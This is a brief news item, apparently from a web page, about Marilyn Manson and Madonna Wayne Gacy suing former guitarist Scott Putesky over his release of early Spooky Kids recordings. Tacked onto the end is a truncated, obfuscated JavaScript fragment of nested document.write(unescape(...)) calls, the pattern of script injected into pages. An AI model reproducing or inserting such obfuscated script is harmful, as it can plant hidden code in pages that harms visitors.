Marilyn Manson and keyboardist Madonna Wayne Gacy is suing his former guitarist, Daisy Berkowitz, over the release of recordings from an early band of theirs.
Berkowitz, who now goes by his given name, Scott Putesky, has recently released a CD and DVD called "Lunch Boxes and Choklit Cows" by their first band, The Spooky Kids.
Putesky has said he won the rights to release the recordings legally. Manson and Gacy claim infringement of copyright, unauthorized use of illustration, images and film footage. They're asking for half a million dollars plus punitive damages and legal costs.
Putesky's lawyer says the lawsuit is not properly founded. He says he has attempted to resolve matters but Manson refuses to discuss them.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
